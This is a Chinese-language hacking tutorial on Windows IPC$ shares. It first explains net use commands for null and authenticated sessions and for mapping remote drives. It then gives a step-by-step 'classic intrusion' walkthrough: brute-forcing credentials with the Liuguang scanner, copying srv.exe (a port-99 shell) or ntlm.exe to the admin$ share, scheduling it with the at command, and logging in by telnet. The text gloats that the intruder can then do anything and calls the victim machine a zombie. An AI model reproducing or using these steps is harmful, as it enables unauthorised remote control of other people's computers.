一、简介:
IPC共享命名的管道资源,为了让进程之间通信而开放的命名管道,可以通过验证用户名和密码获得相应的去权限,远程管理计算机和检查计算机的共享资源时使用的
二、相关基本命令:
1、建立空连接:
net use \\IP\ipc$ "" /user:""
2、建立非空连接:
net use \\IP\ipc$ "密码" /user:" 用户名"
3、映射默认共享:
net use z:\\IP\c$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘
如果已经和目标建立了ipc$连接,则可以使用IP+盘符+$访问,具体命令 net use z: \\IP\c$
4、 删除一个ipc$连接
net use c: /del 删除映射的c盘,其他盘以此类推
net use * /del 删除全部,会有提示要求按y确认
提示:对于不熟悉命令行操作的朋友来说,建立ipc$链接后,可以在“我的电脑”或“网上邻居”右键映射网络驱动器,效果一样
三、经典入侵模式
《流光》举例:
1、先用流光进行ipc扫描爆破(这里以用户名为administrator 密码为空的例子)
2、扫到账户密码进行ipc$连接 net use \\127.0.0.1\IPC$ " " /user:"administrators"
3、将流光中自带的srv.exe上传上去 copy srv.exe \\127.0.0.1\admin$ (这里面的admin$是指用户的c:\winnt\system32\,大家还可以使用从c$ 和 d$ ,意思是c盘与d盘)
(srv.exe是用来在对方的电脑上建立一个99端口的shell )
4、net time \\127.0.0.1 产看对方的主机的时间
5、at \\127.0.0.1 11:05 srv.exe
(用at命令设置任务)
6、等到时间一到,at命令自动执行,这时我们就可以使使用telnet进行远程连接
但是上述方法每次登陆后都要重新进行连接
我们采用下一种方法 (直接建立一个telnet服务):
跟上述的步骤一致 只不过不上传srv.exe 上传ntlm.exe执行
7、这里附加说明后续步骤
8、C:\WINNT\system32>ntml 在对方的主机上启动ntml程序等到出现Done后就可以运行 net start telnet(在对方的主机上)
9、Telnet 127.0.0.1 进入对方主机就可以了 这下想干什么都行 哈哈哈
三、ipc经典入侵步骤
1、net use \\ip\\ipc$ 密码 /user:用户名
2、copy 文件名 \\ip\c$
3、net time \\ip
4、at \\ip 时间 命令
5、入侵成功,连接你的肉鸡